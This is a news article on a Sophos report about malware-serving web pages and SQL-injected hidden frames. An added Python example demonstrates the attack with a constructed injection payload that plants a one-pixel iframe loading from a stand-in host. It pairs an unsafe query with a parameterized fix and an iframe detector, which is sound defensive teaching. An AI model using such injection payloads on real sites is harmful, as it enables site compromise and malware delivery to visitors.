The web is a dangerous place: viruses, malware and other threats lurk seemingly everywhere, and things are getting worse. At least that's the word from Sophos, a security company that tracks viruses and malware threats.
According to a report Sophos just released, the company detects a page with malicious content every 5 seconds, which is three times more than it found in 2007.
It probably wasn’t the number one rating it was looking for, but Google’s Blogger service takes the top honors for Most Likely to Give You a Virus — the Blogspot.com domain accounts for nearly 2 percent of all malware pages.
Given that Blogger offers a “next blog” link at the top of most sites, which will take you to a random blog, it’s particularly problematic for overly trusting users.
The other troubling aspect of Sophos' report is the news that over 90 percent of the pages spreading Trojans and spyware are legitimate websites (some belonging to Fortune 500 companies) that have been hacked through SQL injection.
The most common technique is to sneak a snippet of HTML code onto a legitimate site through an SQL-injection attack. The HTML is generally a single-pixel element that then loads malicious code from an outside site. It's a tough problem for security software, because effectively blocking such pages would mean blocking an otherwise legitimate site.
If there’s one single takeaway from Sophos’ report it’s that web developers aren’t following best practices, or even taking basic security precautions. We’ve said it before and we’ll keep saying it: sanitize all incoming content before you run your database operations.
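The injection path described above, shown as an added example that is not from Sophos' report or the original article: a query built by string pasting next to the same query with bound parameters (one standard way to keep input out of the SQL text), plus a check that scans stored pages for one-pixel frames pointing off-site. The `pages` table, the function names and the `outside.example` host are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample input: a "title" value that closes the string literal
# and appends a one-pixel frame to the stored page body.
PAYLOAD = ("x', body = body || '<iframe src=\"http://outside.example/x\" "
           "width=\"1\" height=\"1\"></iframe>")

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO pages (title, body) VALUES ('Home', '<p>Welcome</p>')")
    return db

def rename_unsafe(db, page_id, title):
    # Weak form: input is pasted into the SQL text, so a quote in `title`
    # ends the literal and the remainder is parsed as SQL.
    db.execute(f"UPDATE pages SET title = '{title}' WHERE id = {page_id}")

def rename_safe(db, page_id, title):
    # Hardened form: placeholders keep input as data, never as SQL.
    db.execute("UPDATE pages SET title = ? WHERE id = ?", (title, page_id))

def find_hidden_frames(db, own_host):
    """Return (page_id, host) for stored iframes of size <= 1px that load
    from a host other than our own."""
    hits = []
    for page_id, body in db.execute("SELECT id, body FROM pages"):
        for tag in re.findall(r"<iframe\b[^>]*>", body, re.I):
            src = re.search(r'src\s*=\s*["\']?https?://([^/"\'\s>]+)', tag, re.I)
            size = re.findall(r'(?:width|height)\s*=\s*["\']?(\d+)', tag, re.I)
            tiny = bool(size) and all(int(s) <= 1 for s in size)
            if src and tiny and src.group(1).lower() != own_host:
                hits.append((page_id, src.group(1)))
    return hits

def demo():
    results = {}
    for name, rename in (("unsafe", rename_unsafe), ("safe", rename_safe)):
        db = make_db()
        rename(db, 1, PAYLOAD)
        results[name] = find_hidden_frames(db, "www.example.com")
    return results

if __name__ == "__main__":
    print(demo())
```

With bound parameters the whole input is stored as the title text and the page body is left unchanged, so the scan finds nothing to report.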